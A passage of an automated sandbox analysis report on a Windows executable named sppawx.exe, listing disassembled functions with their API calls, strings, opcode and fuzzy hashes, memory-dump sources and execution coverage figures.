                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E519032B1A6028AFB24EF25E444A78B791EB45BD8F90817CDA4E47788DF7CE841C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction ID: 2e01b78d3edcd89a96c3a41701cc8073a2d866be18c88203a4e20881a21ce714
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B351AE32A0928286FB74EE319544278B7A0EB54B88F94827EEA8D47795CF3CF451C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction ID: 9dbb84cbd7fe5899863eaf9d411033c2d980f4a947e9828f094150f78da7c031
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B617032909B8586E770EB25E4413AAF7A0FB85784F44427AEB9D07B95DF7CE190CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF79A31352C,?,00000000,00007FF79A313F23), ref: 00007FF79A317F22
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                              • Instruction ID: f0f94f65abb296293535af719a6d8c2703c709ee808a3900b946d0e521de170b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8831A52171EAC145FA31EB31A8507EAB354EB84BE4F84027DEA6D477C9DF2CD6458B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction ID: e74d699b85bd072155c6ab6c3068ce818dbb823c0799ebde9350cc438ab1150d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91219F62B09B4192F660EB65B8847EAB3A4EB88784F80013EEE8D57659DF3CD645C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction ID: 6f13d7355a447b337cb2b16aa368540a50fe4dc5cc010ef18627a4f7018a9e19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0D1E172B1AA818AF720DF75D4402ACB7B1FB44798B84826EDE5D97B89DE38D006C350
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction ID: 3792dfb13cff3f18d9881d019c0e66cdf3257075df389e5363ed49343d3db61d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3051E372F0A1118BFB38EF3499516BCB7A1AB4435CFD1427DDE1E92AE5DB38A4118610
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction ID: e89e7d9330ac4f7a19c0994c40f32e66db41e33101acb9eb9cc5a0035b14d378
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC519E22E0A6418AFB20EF71D4503BDB3A5AB48B58F94847DEE4D97A89DF3CD5418720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: 341753ab018fe6a76de596b9a199baeba66350a323dafa424fae5e7309806819
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8211E921E0D14242F6A4EBBBE5492B9F251EB84784FC4417CEB4907B89CD2DD8D18224
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                              • Instruction ID: 9b0d6ec61e2f200a216c3a4e1c6f7b63006c807f338435d4fb72607c3c5f3780
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5341E512E0E6824AFB74AB359401379F690EB80BA8FD4427DEE5C06ED5DE3CD441C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3290B6
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF79A31CC15), ref: 00007FF79A3290D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-2372293429
                                                                                                                                                                                                                              • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                              • Instruction ID: f3b8e03180fc3f0568613b12359a417318771e9c3ad5632761333a91334faff2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A415B32A0AB1686FB64EF36A8810B8B794EB44790B95507DED4D43B85DE3CE481C360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction ID: 56927b0d103b8bcfc167e0774e2848b129515644c4a115c5d3f743e5f2fec9f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED419322B19B8581EB609F35E8443A9B7A0FB98794F844039EE4D87B98EF3CD411C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                              • Instruction ID: 4e1fd81dc36432723768758053b2140e424b0c93bad1eb94ad0a12165e789b89
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB21E163A0928182FB70AB31D04826DF3B1FB88B48FD5807DDA8D43694DF7CE9558B60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction ID: b840087720e8b2518e63abfa82fb4efe4917aad8864f4536ad74be85905c2eba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44115B32A09B8182EB20DF25F400269B7E0FB88B84F984279EE8D07769DF3CD551CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction ID: 661e98d332bd1102e4b862f825f9ff25bf39f272a3d811e7275bb2396d4bd79c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D017C22E1E20296F730BF70946627EB3A0EF85708FC0107EE95D86695DE2CE544CA24

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:6.8%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:1.9%
                                                                                                                                                                                                                              Total number of Nodes:954
                                                                                                                                                                                                                              Total number of Limit Nodes:83
